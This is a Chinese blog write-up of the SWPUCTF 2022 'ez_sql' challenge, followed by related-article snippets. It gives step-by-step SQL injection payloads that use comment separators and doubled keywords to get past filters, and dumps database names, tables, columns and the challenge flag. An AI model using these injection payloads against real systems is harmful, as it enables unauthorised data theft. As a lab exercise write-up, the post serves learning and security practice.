[SWPUCTF-2022-新生赛]ez_sql

最新推荐文章于 2024-05-15 00:54:47 发布
最新推荐文章于 2024-05-15 00:54:47 发布
阅读量637 收藏 2
点赞数 8
分类专栏: CTF 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liaochonxiang/article/details/138166509
版权

title:[SWPUCTF 2022 新生赛]ez_sql

审题

image-20240424174236580

根据提示,POST传参

image-20240424174329686

得到假的flag

判断类型

image-20240424175218834

字符型注入

判断列数

image-20240424175251377

发现空格和’or’被过滤

重新构造

nss=-1'/**/oorrder/**/by/**/4#

image-20240424175529650

发现为3个字段

采用联合注入union

爆库

image-20240424175750382

发现union被过滤,双写union绕过

image-20240424180015437

发现没有显示我们需要的一页,切换页数

得到数据库: NSS_db

爆表

image-20240424180353945

发现information_schema被过滤,尝试双写

nss=-1'/**/ununionion/**/select/**/1,group_concat(table_name),database()/**/from/**/inforinformation_schemamation_schema.tables/**/where/**/table_schema=database()/**/limit/**/1,1%23

image-20240424181118655

发现并没有用还是过滤了’or’

双写绕过

nss=-1'/**/ununionion/**/select/**/1,group_concat(table_name),database()/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()/**/limit/**/1,1%23

image-20240424181234252

得到两个表: NSS_tb,users

显然users无用

爆字段

nss=-1'/**/ununionion/**/select/**/1,group_concat(column_name),database()/**/from/**/infoorrmation_schema.columns/**/where/**/table_name=' NSS_tb'/**/limit/**/1,1%23

image-20240424181559010

得到字段: id,Secr3t,flll444g

显然id没用

爆字段内容

nss=-1'/**/ununionion/**/select/**/1,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_db.NSS_tb/**/limit/**/1,1%23

image-20240424181921809
得到真正的flag: NSSCTF{e9e4d32b-8d81-4718-b0c7-54c3c29110f1}

liqingdi437
关注
专栏目录
EZ-USB-General-Purpose-Driver-Spec.rar_ez usb _ez-usb_purpose
09-20
EZ-USB通用驱动程序是USB设备开发中的一个重要组成部分,它为开发者提供了与USB设备交互的接口,使得设备能够顺利地在主机系统上运行。本文将深入探讨EZ-USB的通用驱动程序及其在USB驱动程序开发过程中的应用。 USB...
[SWPUCTF 2022 新生]ez_sql
m0_46056107的博客
11-25 391
参数为1的时候没有报错,为2和任何数的时候报,发现空格被过滤了,然后union需要双拼写。它的表有两个为,NSS_tb和users。查表的字段发现flag。数据库为NSS_db。
SWPUCTF 2022新生 web部分wp
weixin_44770698的博客
01-16 4227
SWPUCTF 2022新生
NSSCTF做题(10)
wwwwyyyrre的博客
10-19 494
叫10好听一点,就是补9的 第7页的内容。
【Web】SWPUCTF 2022 新生 个人复现
uuzeray的博客
11-28 738
挑了部分题,太简单的就没选进来(但选进来≠有难度)
NSSCTF-[SWPUCTF 2022]-web
J1ng_Hong的博客
11-14 751
ls发现根目录下有一个flag文件,然后用cat把他读取出来就行了。然后就得到了flag。
EZ-USBFX2.rar_ez usb _ez-usb_ez-usb fx2
09-21
"EZ-USB FX2.rar_ez usb _ez-usb_ez-usb fx2"这个标题可能是指一个包含EZ-USB FX2相关资料的压缩文件,包括驱动程序和可能的技术文档。 **EZ-USB FX2关键特性** 1. **集成USB控制器**: EZ-USB FX2内含一个全速USB ...
FX2-Slave-FIFO.rar_ez-usb_fifo VHDL
09-22
CY7C68013,也被称为EZ-USB FX2,是 Cypress Semiconductor 公司推出的一款集成USB控制器的微处理器,它支持多种USB设备模式,其中包括Slave FIFO模式。Slave FIFO模式允许FX2作为一个USB设备接收或发送数据到主机,...
Anchor_EZ-Link_Cable.rar_Anchor_EZ-Link_Cable_anchor ez link_anc
09-21
【标题】"Anchor EZ-Link Cable.rar" 是一个关于 Anchor EZ-Link Cable 的驱动程序压缩包,其中包含了在Windows CE操作系统上使用该设备所需的驱动文件。"Anchor EZ-Link Cable" 是一种特殊的通信线缆,它允许用户在...
ADSP-BF533_EZ_KIT_Lite_Assembly.zip_ADSP-BF51_adsp-bf533_bf533
09-24
标题中的"ADSP-BF533_EZ_KIT_Lite_Assembly.zip_ADSP-BF51_adsp-bf533_bf533"指的是ADI公司的Blackfin系列数字信号处理器(DSP)的开发套件,特别是ADSP-BF533 EZ-KIT Lite的组装资料。该开发套件是针对ADSP-BF533和...
2022 UUCTF Web
weixin_63231007的博客
12-19 2606
2022UUCTF web部分题分析
SWPU NSS新生校外通道(部分WP)
qq_63205508的博客
10-28 1123
NSSCTF、SWPU NSS新生校外通道、WP
NSSCTF第11页(3)
wwwwyyyrre的博客
11-09 704
源码发现会在写入文件之前会删除目录下的除了index.php的文件。写入文件的文件名和文件内容也是可控的,只不过存在过滤stristr函数对文件内容进行过滤,该函数绕过还是简单的,只需要添加一些特殊字符就可以了,和字符串弱类型比较相似。对于文件名的正则匹配,有点没读懂怎么个条件,到底是允许字母还是不允许,测试了一下该代码环境,运行之后明白该正则条件输入.[a-z]是可以绕过该正则的,返回false知道了这些剩下的就是利用了既然会删除除了index.php文件,直接覆盖index.php。
2022UUCTF-web
bossDDYY的博客
11-03 2036
我们先输入手机号和验证码试试,发现无论请求多少次 hint永远是895547922,结合mt_srand和mt_rand函数 当设置的种子确定(此处的种子时输入的手机号)时,每次的mt_rand都是固定的 我们可以猜测hint就是mt_rand的第一次,而目的验证码就是mt_rand的第二次。而且我们笃定是有上传的网页的,限制了文件类型 我们想要上传的是so,但是LD_PRELOAD也能解析jpg后缀 所以修改后缀上传就可以。sub的值是当前时间的最后一位,也就是保证当前的时间为xxxxxxxx1即可。
【CTF】[UUCTF 2022 新生]ez_upload
西原一点红的博客
06-19 964
Apache解析漏洞主要是因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准),可用来绕过黑名单过滤。webshell工具连接。flag 在/目录下。
[SWPUCTF 2021 新生]easy_sql
wyxlsm的博客
02-20 304
看库的表 使用函数 union_select 和 information_schema 的函数。我们可以简单看到 name:xxx password:yy 可能有数据库等你注入。这里 就看到提示你参数wllm 这边使用get 传参 让你输入点东西 可以。可以看出 使用函数 union_select 的命令 看出上限 在3。wllm =1' 可以看出字符串漏洞 去一步一步的开库。看到这个界面你直接打开F12或F11看源代码 看有什么提示。已经得出 查看flag值。
UUCTF2022-Writeup
Ivyyyyyy1的博客
10-31 1480
UUCTF2022 Writeup
[HUBUCTF 2022 新生]
zhhhb1005的博客
09-25 3272
这里卡在exp怎么写,后来详细了解了一下序列化和反序列化以后,再结合上面的isset( ),知道了username和password要用boolen类型,才写了出来。题目是想让我们做数学题,而且要速度介于1-3s之间,回答20个问题即可给出flag。函数 ,对于/a-zA-Z/这个正则表达式,我们可以利用PHP动态函数的特性,构造出字符串。先对代码进行审计,发现isset( )是我们没见过的用法,可以去了解一下。,$_GET['id']是通过get方法传过来的值。如果$_GET['id']没有被设置,则。
[HUBUCTF 2022 新生]ezsql
最新发布
liaochonxiang的博客
05-15 398
发现密文以md5(password)形式存储在数据库中。users要换成十六进制0x7573657273。思路:更新资料的时候可以同时更新所有密码。我们需要知道密码的字段名。爆password字段。
sed -i -e 's/LS65_ACCT2/LS6_HIST2/g' \ -e 's/LS6_ACCT_WH/LS6_HIST_WH/g' \ -e 's/LS65_ACCT_YC/LS6_HIST_YC/g' \ -e 's/LS65_ACCT_EZ/LS6_HIST_EZ/g' \ -e 's/LS65_ACCT_SZ/LS6_HIST_SZ/g' \ -e 's/LS65_ACCT_XG/LS6_HIST_XG/g' \ -e 's/LS65_ACCT_SY/LS6_HIST_SY/g' \ -e 's/LS65_ACCT_XF/LS6_HIST_XF/g' \ -e 's/LS65_ACCT_ES/LS6_HIST_ES/g' \ -e 's/LS65_ACCT_SNJ/LS6_HIST_SNJ/g' \ -e 's/LS65_ACCT_JZ/LS6_HIST_JZ/g' \ -e 's/LS65_ACCT_HG/LS6_HIST_HG/g' \ -e 's/LS65_ACCT_XN/LS6_HIST_XN/g' \ -e 's/LS65_ACCT_JM/LS6_HIST_JM/g' \ -e 's/LS65_ACCT_HS/LS6_HIST_HS/g' \ -e 's/LS65_ACCT_XT/LS6_HIST_XT/g' \ -e 's/LS65_ACCT_TM/LS6_HIST_TM/g' \ -e 's/LS65_ACCT_QJ/LS6_HIST_QJ/g' \ -e 's/LS65_ACCTM_MVNO/LS6_HISTM_MVNO/g' \ -e 's/CREATE INDEX/CREATE \/\*+ parallel(4) \*\/ INDEX/g' \ -e 's/ LOCAL/&;/g' htxx202303_idx_create.sql
06-06
这段代码是一个 sed 命令,用于在 htxx202303_idx_create.sql 文件中进行多个字符串的替换和添加。其中 -i 选项表示直接修改文件内容,而不是输出到终端;-e 选项表示接下来的字符串是命令。具体操作为: - 将 LS65_ACCT2 替换成 LS6_HIST2 - 将 LS6_ACCT_WH 替换成 LS6_HIST_WH - 将 LS65_ACCT_YC 替换成 LS6_HIST_YC - 将 LS65_ACCT_EZ 替换成 LS6_HIST_EZ - 将 LS65_ACCT_SZ 替换成 LS6_HIST_SZ - 将 LS65_ACCT_XG 替换成 LS6_HIST_XG - 将 LS65_ACCT_SY 替换成 LS6_HIST_SY - 将 LS65_ACCT_XF 替换成 LS6_HIST_XF - 将 LS65_ACCT_ES 替换成 LS6_HIST_ES - 将 LS65_ACCT_SNJ 替换成 LS6_HIST_SNJ - 将 LS65_ACCT_JZ 替换成 LS6_HIST_JZ - 将 LS65_ACCT_HG 替换成 LS6_HIST_HG - 将 LS65_ACCT_XN 替换成 LS6_HIST_XN - 将 LS65_ACCT_JM 替换成 LS6_HIST_JM - 将 LS65_ACCT_HS 替换成 LS6_HIST_HS - 将 LS65_ACCT_XT 替换成 LS6_HIST_XT - 将 LS65_ACCT_TM 替换成 LS6_HIST_TM - 将 LS65_ACCT_QJ 替换成 LS6_HIST_QJ - 将 LS65_ACCTM_MVNO 替换成 LS6_HISTM_MVNO - 在 CREATE INDEX 之前添加 /\*+ parallel(4) \*/,表示创建索引时启用 4 个并发线程 - 在 LOCAL 后添加分号;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值